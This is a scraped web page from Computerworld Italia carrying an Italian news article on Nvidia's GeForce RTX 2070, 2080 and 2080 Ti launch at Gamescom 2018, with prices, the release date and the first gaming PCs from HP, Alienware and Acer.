	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106301"><a rel="nofollow" href="https://www.cwi.it/sicurezza/compliance-e-regolamenti">Compliance e Regolamenti</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106302"><a rel="nofollow" title="Cloud Computing" href="https://www.cwi.it/cloud-computing">Cloud</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106303"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/cloud-ibrido">Cloud ibrido</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106304"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/cluod-privato">Cloud Privato</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106305"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/cloud-pubblico">Cloud Pubblico</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106306"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/cloud-storage">Cloud Storage</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106307"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/sicurezza-cloud">Sicurezza Cloud</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106308"><a rel="nofollow" title="Data Center" href="https://www.cwi.it/data-center">Data Center</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106312"><a rel="nofollow" href="https://www.cwi.it/data-center/gestione-infrastruttura">Gestione infrastruttura</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106313"><a rel="nofollow" href="https://www.cwi.it/data-center/mainframe">Mainframe</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106311"><a rel="nofollow" href="https://www.cwi.it/data-center/high-performance-computing-hpc">High Performance Computing (HPC)</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106309"><a rel="nofollow" href="https://www.cwi.it/data-center/storage">Storage</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106315"><a rel="nofollow" href="https://www.cwi.it/data-center/virtualizzazione">Virtualizzazione</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106310"><a rel="nofollow" href="https://www.cwi.it/data-center/disaster-recovery">Disaster Recovery</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106314"><a rel="nofollow" href="https://www.cwi.it/data-center/green-it">Green IT</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106316"><a rel="nofollow" title="Networking" href="https://www.cwi.it/networking">Networking</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106319"><a rel="nofollow" href="https://www.cwi.it/networking/hardware-di-rete">Hardware di Rete</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106321"><a rel="nofollow" href="https://www.cwi.it/networking/software-di-rete">Software di Rete</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106322"><a rel="nofollow" href="https://www.cwi.it/networking/reti-wireless">Reti Wireless</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106318"><a rel="nofollow" href="https://www.cwi.it/networking/lan-wan">LAN &#038; WAN</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106323"><a rel="nofollow" href="https://www.cwi.it/networking/broadband">Broadband</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106320"><a rel="nofollow" href="https://www.cwi.it/networking/sicurezza-di-rete">Sicurezza di Rete</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106317"><a rel="nofollow" href="https://www.cwi.it/networking/software-defined-networking">Software Defined Networking</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106325"><a rel="nofollow" title="Big Data, Analytics e Infrastruttura" href="https://www.cwi.it/big-data">Big data</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106326"><a rel="nofollow" href="https://www.cwi.it/big-data/big-data-analytics">Big Data Analytics</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106324"><a rel="nofollow" href="https://www.cwi.it/big-data/applicazioni-big-data">Applicazioni Big Data</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106327"><a rel="nofollow" href="https://www.cwi.it/big-data/infrastruttura-big-data">Infrastruttura Big Data</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106328"><a rel="nofollow" title="Innovazione Business e Digital Transformation" href="https://www.cwi.it/tecnologie-emergenti">Innovazione</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106331"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/internet-of-things">Internet of Things</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106335"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/intelligenza-artificiale">Intelligenza Artificiale</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-112454"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/blockchain">Blockchain</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-107642"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/realta-virtuale">Realtà Virtuale</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106329"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/stampa-3d">Stampa 3D</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106338"><a rel="nofollow" title="wearables" href="https://www.cwi.it/tecnologie-emergenti/computer-indossabili">Indossabili</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106333"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/robotica">Robotica</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106334"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/tecnologia-aerospaziale">Tecnologia aerospaziale</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106330"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/ambiente">Ambiente</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106332"><a rel="nofollow" title="Internet of Things" href="https://www.cwi.it/tecnologie-emergenti/internet-of-things">IoT</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106336"><a rel="nofollow" title="Intelligenza Artificiale" href="https://www.cwi.it/tecnologie-emergenti/intelligenza-artificiale">AI</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106339"><a rel="nofollow" title="Strategia Digital e ICT" href="https://www.cwi.it/strategia-it">Strategia IT</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106341"><a rel="nofollow" href="https://www.cwi.it/strategia-it/acquisti-e-procurement">Acquisti e Procurement</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106347"><a rel="nofollow" href="https://www.cwi.it/management-it/outsourcing">Outsourcing</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106349"><a rel="nofollow" href="https://www.cwi.it/management-it/project-management-it">Project Management IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106352"><a rel="nofollow" href="https://www.cwi.it/management-it">Management IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106342"><a rel="nofollow" href="https://www.cwi.it/strategia-it/organizzazione-it">Organizzazione IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106348"><a rel="nofollow" href="https://www.cwi.it/management-it/personale-it">Personale IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106350"><a rel="nofollow" href="https://www.cwi.it/management-it/skill-it-e-formazione">Skill IT e Formazione</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106343"><a rel="nofollow" href="https://www.cwi.it/strategia-it/innovazione">Innovazione IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106340"><a rel="nofollow" href="https://www.cwi.it/strategia-it/il-ruolo-del-cio">Il ruolo del CIO</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106344"><a rel="nofollow" href="https://www.cwi.it/strategia-it/leadership-management">Leadership/Management</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106345"><a rel="nofollow" href="https://www.cwi.it/strategia-it/industria-it">Industria IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106346"><a rel="nofollow" href="https://www.cwi.it/management-it/carriere-it">Carriere IT</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106351"><a rel="nofollow" href="https://www.cwi.it/management-it/trasformazione-it">Trasformazione nell&#8217;IT</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-106353"><a rel="nofollow" title="White Paper Informatica" href="https://www.cwi.it/c/risorse/white-paper">White Paper</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_1_5b7e84acbc512 = new td_block();
block_td_uid_1_5b7e84acbc512.id = "td_uid_1_5b7e84acbc512";
block_td_uid_1_5b7e84acbc512.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"1829","show_child_cat":"5","td_ajax_filter_type":"td_category_ids_filter"}';
block_td_uid_1_5b7e84acbc512.td_column_number = "3";
block_td_uid_1_5b7e84acbc512.block_type = "td_block_mega_menu";
block_td_uid_1_5b7e84acbc512.post_count = "5";
block_td_uid_1_5b7e84acbc512.found_posts = "15";
block_td_uid_1_5b7e84acbc512.max_num_pages = "3";
block_td_uid_1_5b7e84acbc512.header_color = "";
block_td_uid_1_5b7e84acbc512.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_1_5b7e84acbc512);
</script><div class="td_block_wrap td_block_mega_menu  td-no-subcats td-pb-border-top"><div id=td_uid_1_5b7e84acbc512 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366"  title="Computerworld Italia &#8211; Speciale Industria 4.0"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/07/cwi-speciale-manufacturing-cover-180x135.png" alt="Computerworld Speciale Industria 4.0" title="Computerworld Italia &#8211; Speciale Industria 4.0"/></a></div>                <a rel="nofollow" href="https://www.cwi.it/c/articoli" class="td-post-category">Articoli</a>            </div>

            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366"  title="Computerworld Italia &#8211; Speciale Industria 4.0">Computerworld Italia &#8211; Speciale Industria 4.0</a></div>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263"  title="Computerworld Italia &#8211; Speciale GDPR"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/04/computerworld-speciale-gdpr-180x135.jpg" alt="" title="Computerworld Italia &#8211; Speciale GDPR"/></a></div>                <a rel="nofollow" href="https://www.cwi.it/c/risorse/computerworld-rivista" class="td-post-category">Computerworld Rivista</a>            </div>

            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263"  title="Computerworld Italia &#8211; Speciale GDPR">Computerworld Italia &#8211; Speciale GDPR</a></div>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353"  title="Computerworld Italia &#8211; Speciale Data Center"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2017/11/Computerworld-speciale-data-center-1-180x135.jpg" alt="" title="Computerworld Italia &#8211; Speciale Data Center"/></a></div>                <a rel="nofollow" href="https://www.cwi.it/c/articoli" class="td-post-category">Articoli</a>            </div>

            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353"  title="Computerworld Italia &#8211; Speciale Data Center">Computerworld Italia &#8211; Speciale Data Center</a></div>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/internet-of-things/computerword-maggio-2017-speciale-iot-105206"  title="Computerworld Italia &#8211; Speciale Internet of Things"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2017/06/Computerworld-Maggio-2017-320-180x135.jpg" alt="" title="Computerworld Italia &#8211; Speciale Internet of Things"/></a></div>                <a rel="nofollow" href="https://www.cwi.it/c/risorse/computerworld-rivista" class="td-post-category">Computerworld Rivista</a>            </div>

            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/tecnologie-emergenti/internet-of-things/computerword-maggio-2017-speciale-iot-105206"  title="Computerworld Italia &#8211; Speciale Internet of Things">Computerworld Italia &#8211; Speciale Internet of Things</a></div>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/computerworld-italia-speciale-cloud-virtualizzazione-100694"  title="Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2016/11/computerworld-10-12-speciale-cloud-virtualizzazione-180x135.jpg" alt="Computerworld Italia - Speciale Cloud e Virtualizzazione" title="Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione"/></a></div>                <a rel="nofollow" href="https://www.cwi.it/cloud-computing" class="td-post-category">Cloud Computing</a>            </div>

            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/computerworld-italia-speciale-cloud-virtualizzazione-100694"  title="Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione">Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione</a></div>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a rel="nofollow" href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5b7e84acbc512" data-td_block_id="td_uid_1_5b7e84acbc512"><i class="td-icon-font td-icon-menu-left"></i></a><a rel="nofollow" href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5b7e84acbc512" data-td_block_id="td_uid_1_5b7e84acbc512"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-106573"><a rel="nofollow" href="https://www.cwi.it/cio">CIO</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-106880"><a rel="nofollow" href="http://www.cwi.it/go/newsletter-subscribe/">NEWSLETTER</a></li>
</ul></div></div>

<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a rel="nofollow" id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="dropdown-menu" aria-labelledby="search-button">
			<form role="search" method="get" class="td-search-form" action="https://www.cwi.it/">
				<div class="td-head-form-search-wrap">
					<input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Ricerca" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>        </div>
    </div>
</div><div class="td-musthead" >
    <div class="td-header-container td-header-wrap td-header-style-1">
        <ul class="sf-menu"><li></li></ul>
    </div>
</div>
<div class="td-container td-post-template-2">
            <div class="cwi-social-desktop">
            <div class="cwi-social-desktop-content">
                <div class="oss_title_replace oss-share-vertical-fix oss_ver_share_shortcode 5b7e84acd7494"  data-share-titles="Presentate le nuove Nvidia GeForce RTX, il futuro del gaming" data-share-description="L'attesa è finita. In occasione dell’evento #BeForTheGame, che ha preceduto l’apertura della Ga" data-share-imageurl="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom.jpg"  data-share-url="https://www.cwi.it/hardware/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645"></div>            </div>
        </div>
        <div class="td-container-border">
        <article id="post-114645" class="post-114645 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-hardware category-news tag-geforce-rtx tag-nvidia lingua-it" >
            <div class="td-pb-row">
                <div class="td-pb-span12">
                    <div class="td-post-header td-pb-padding-side">
                        
                        <ul class="td-category"><li class="entry-category"><a  href="https://www.cwi.it/hardware">Hardware</a></li></ul>
                        <header>
                            <h1 class="entry-title">Presentate le nuove Nvidia GeForce RTX, il futuro del gaming</h1>

                                                            <h2 class="post-subtitle"><p class="td-post-sub-title">Le nuove Nvidia GeForce RTX saranno disponibili dal 20 settembre 2018, ma Acer, Alienware e HP hanno annunciato i primi PC da gaming che sfruttano le nuove GPU</p></h2>
                            

                            <div class="meta-info">

                                <div class="td-post-author-name">di <a href="https://www.cwi.it/author/redazione-computerworld">CWI.it</a> - </div>                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-21T17:54:40+00:00" >Ago 21, 2018</time></div>                                                                                            </div>
                        </header>
                    </div>
                </div>
            </div> <!-- /.td-pb-row -->

            <div class="td-pb-row">
                                            <div class="td-pb-span8 td-main-content" role="main">
                                <div class="td-ss-main-content">
                                                    <!--div class="td-post-content td-pb-padding-side" itemprop="articlebody"-->
        <div class="td-post-content td-pb-padding-side">
            <div class="td-post-featured-image"><figure><span><img width="640" height="427" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom-640x427.jpg" alt="nvidia_geforce_rtx_jensen_huang_gamescom" title="nvidia_geforce_rtx_jensen_huang_gamescom"/><figcaption class="wp-caption-text">Il CEO di Nvidia Jensen Huang presenta la nuova serie GeForce RTX a Gamescon</figcaption></figure></div>
                        <div class="cwi-social-mobile">
                            </div>
            
            <div class="td-a-rec td-a-rec-id-content_top "><script type='text/javascript' src='https://cdn.allyouwant.online/main.js?t=n2'></script></div><div class="td-a-rec td-a-rec-id-content_inline "><script type='text/javascript' src='https://cdn.allyouwant.online/main.js?t=n2'></script></div><p>L&#8217;attesa è finita. In occasione dell’evento #BeForTheGame, che ha preceduto l’apertura della <a href="http://www.gamescom.global/" target="_blank" rel="noopener nofollow" class="external">Gamescom</a> di Colonia, il CEO di Nvidia Jensen Huang ha presentato con orgoglio le tanto attese GeForce RTX 2080 e GeForce RTX 2080 Ti basate sulla nuova architettura Turing dell&#8217;azienda.</p>
<p>Le schede grafiche sono dotate di tensore dedicato e core RT per accelerare il ray-tracing in tempo reale, il Santo Graal della grafica per il gaming, e una potenza visiva sufficiente per alimentare display 4K G-Sync HDR. Sono inoltre dotate di una connessione VirtualLink VR all&#8217;avanguardia e di una connessione SLI più rapida, chiamata NVLink.</p>
<p>Le nuove <a href="https://www.nvidia.it/geforce/buy/" target="_blank" rel="noopener nofollow" class="external">GeForce RTX</a> promettono prestazioni rivoluzionarie nel ray-tracing in tempo reale e rappresentano il futuro del gaming; naturalmente, non costano poco. La GeForce RTX 2080 Ti Founders Edition da 999 dollari supera la precedente GTX 1080 Ti, mentre la GeForce RTX 2080 da 699 dollari va oltre le precedenti generazioni nelle operazioni di ray tracing in tempo reale. Questo li rende tra le prime GPU consumer in grado di stare al passo con i nuovissimi monitor HDR 4K G-Sync da 2mila dollari di Nvidia, l’Acer Predator X27 e l’Asus ROG Swift PG27UQ. In precedenza, solo la GTX 1080 Ti e l&#8217;hardware di classe Titan potevano supportare questo tipo di display. Nvidia ha anche annunciato una GeForce RTX 2070 da 499 dollari.</p>
<p>Le GPU GeForce RTX 2070, 2080 e 2080 Ti non saranno disponibili fino al 20 settembre, ma diversi produttori hanno già annunciato hardware basato sulle nuove schede Nvidia. Ecco quanto presentato finora.</p>
<h3>HP Omen Obelisk</h3>
<p><img class="aligncenter size-full wp-image-114647" src="https://static.cwi.it/wp-content/uploads/2018/08/HP-omen_obelisk.jpg" alt="omen_obelisk" width="640" height="360" srcset="https://static.cwi.it/wp-content/uploads/2018/08/HP-omen_obelisk.jpg 640w, https://static.cwi.it/wp-content/uploads/2018/08/HP-omen_obelisk-300x169.jpg 300w, https://static.cwi.it/wp-content/uploads/2018/08/HP-omen_obelisk-600x338.jpg 600w, https://static.cwi.it/wp-content/uploads/2018/08/HP-omen_obelisk-100x56.jpg 100w" sizes="(max-width: 640px) 100vw, 640px" />HP ha annunciato una nuova versione di Omen Obelisk, che sarà uno dei primi PC con le nuove schede RTX di Nvidia.</p><span id="vm-anchor"></span>
<p>Omen è caratterizzato da una finestra in vetro temperato e dall&#8217;illuminazione RGB. Obelisk sarà disponibile nelle due opzioni AMD Ryzen e Intel Core.</p>
<h3>Alienware Aurora e Area 51</h3>
<p><img class="aligncenter size-full wp-image-114648" src="https://static.cwi.it/wp-content/uploads/2018/08/alienware-aurora.jpg" alt="alienware aurora" width="640" height="567" srcset="https://static.cwi.it/wp-content/uploads/2018/08/alienware-aurora.jpg 640w, https://static.cwi.it/wp-content/uploads/2018/08/alienware-aurora-300x266.jpg 300w, https://static.cwi.it/wp-content/uploads/2018/08/alienware-aurora-600x532.jpg 600w, https://static.cwi.it/wp-content/uploads/2018/08/alienware-aurora-100x89.jpg 100w" sizes="(max-width: 640px) 100vw, 640px" />Alienware ha dichiarato che le GPu di nuova generazione di Nvidia saranno installate nei suoi desktop Alienware Aurora e Area 51.</p>
<p>Come il PC Omen, Aurora è basato su una scheda madre MicroATX. Il prezzo base di Aurora sarà di 899 dollari, ma riteniamo che non sarà la configurazione con una GeForce RTX all&#8217;interno. Alienware non ha fornito ulteriori informazioni su Area 51.</p>
<h3>Acer Predator</h3>
<p><img class="aligncenter size-full wp-image-114649" src="https://static.cwi.it/wp-content/uploads/2018/08/acerpredator_orion_9000.jpg" alt="acerpredator_orion_9000" width="640" height="658" srcset="https://static.cwi.it/wp-content/uploads/2018/08/acerpredator_orion_9000.jpg 640w, https://static.cwi.it/wp-content/uploads/2018/08/acerpredator_orion_9000-292x300.jpg 292w, https://static.cwi.it/wp-content/uploads/2018/08/acerpredator_orion_9000-600x617.jpg 600w, https://static.cwi.it/wp-content/uploads/2018/08/acerpredator_orion_9000-100x103.jpg 100w" sizes="(max-width: 640px) 100vw, 640px" />Anche Acer è salita sul carro delle GeForce RTX, che saranno integrate nelle serie Orion 3000 e Orion 5000. Probabilmente la serie più adatta alle GeForce RTX sarà la Orion 9000.</p>
<p>L’Orion 9000 è il fiore all’occhiello dell&#8217;azienda. Il PC può essere configurato con un Core i9-7980XE a 18 core e raffreddamento a liquido. Come l’Omen Obelisk, il dispositivo include molte finestre, ma racchiuse in una gabbia metallica per ridurre le interferenze elettromagnetiche.<br />
Il Predator Orion 9000 è così grande che Acer ha deciso di integrare ruote posteriori e una maniglia nella parte superiore.</p>
</p><div class="td-a-rec td-a-rec-id-content_bottom "><script type='text/javascript' src='https://cdn.allyouwant.online/main.js?t=n2'></script></div>            
                        <div class="cwi-social-mobile">
                            </div>
            
        </div>

                <footer>
                        
            <div class="td-post-source-tags td-pb-padding-side">
                <div class="td-post-source-via"><div class="td-post-small-box"><span>AUTORE</span><a rel="nofollow" rel="nofollow" href="#">Gordon Mah Ung</a></div><div class="td-post-small-box"><span>FONTE</span><a rel="nofollow" rel="nofollow" href="#">PCWorld</a></div></div>                <ul class="td-tags td-post-small-box clearfix"><li><span>TAG</span></li><li><a rel="nofollow" href="https://www.cwi.it/tag/geforce-rtx">GeForce RTX</a></li><li><a rel="nofollow" href="https://www.cwi.it/tag/nvidia">Nvidia</a></li></ul>            </div>

                                    <div class="author-box-wrap"><a rel="nofollow" href="https://www.cwi.it/author/redazione-computerworld"><img src="https://static.cwi.it/wp-content/uploads/2015/03/180_180-150x150.jpg" width="106" height="106" alt="CWI.it" class="avatar avatar-106 wp-user-avatar wp-user-avatar-106 alignnone photo" /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a rel="nofollow" href="https://www.cwi.it/author/redazione-computerworld">CWI.it</a></span></div><div>Con 12 milioni di lettori in 47 paesi, Computerworld è la fonte di informazione e aggiornamento per tutti coloro che progettano, implementano o utilizzano la tecnologia in azienda.</div><div class="td-author-social"><span class="td-social-icon-wrap"><a rel="nofollow" href="https://it-it.facebook.com/computerworlditalia" title="Facebook" class="external"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a rel="nofollow" href="https://www.linkedin.com/showcase/11067468/" title="Linkedin" class="external"><i class="td-icon-font td-icon-linkedin"></i></a></span><span class="td-social-icon-wrap"><a rel="nofollow" href="https://twitter.com/computerworldit" title="Twitter" class="external"><i class="td-icon-font td-icon-twitter"></i></a></span></div><div class="clearfix"></div></div></div>	                </footer>

    <script>var block_td_uid_2_5b7e84ad4509b = new td_block();
block_td_uid_2_5b7e84ad4509b.id = "td_uid_2_5b7e84ad4509b";
block_td_uid_2_5b7e84ad4509b.atts = '{"limit":6,"ajax_pagination":"next_prev","live_filter":"cur_post_same_tags","td_ajax_filter_type":"td_custom_related","class":"","td_column_number":3,"live_filter_cur_post_id":114645,"live_filter_cur_post_author":"4"}';
block_td_uid_2_5b7e84ad4509b.td_column_number = "3";
block_td_uid_2_5b7e84ad4509b.block_type = "td_block_related_posts";
block_td_uid_2_5b7e84ad4509b.post_count = "6";
block_td_uid_2_5b7e84ad4509b.found_posts = "22";
block_td_uid_2_5b7e84ad4509b.max_num_pages = "4";
block_td_uid_2_5b7e84ad4509b.header_color = "";
block_td_uid_2_5b7e84ad4509b.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_2_5b7e84ad4509b);
</script><div class="td_block_wrap td_block_related_posts td-pb-border-top"><div class="td-related-title"><a rel="nofollow" id="td_uid_3_5b7e84ad4c1ef" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_2_5b7e84ad4509b" href="#">ARTICOLI CORRELATI</a><a rel="nofollow" id="td_uid_4_5b7e84ad4c247" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_2_5b7e84ad4509b" href="#">DALLO STESSO AUTORE</a></div><div id=td_uid_2_5b7e84ad4509b class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/hardware/server/nvidia-server-asus-114116"  title="Sempre più Nvidia e intelligenza artificiale nei server di Asus"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/07/ESC8000-G4_F-3D-open-238x178.jpg" alt="nvidia" title="Sempre più Nvidia e intelligenza artificiale nei server di Asus"/></a></div>                            </div>
            <div class="item-details">
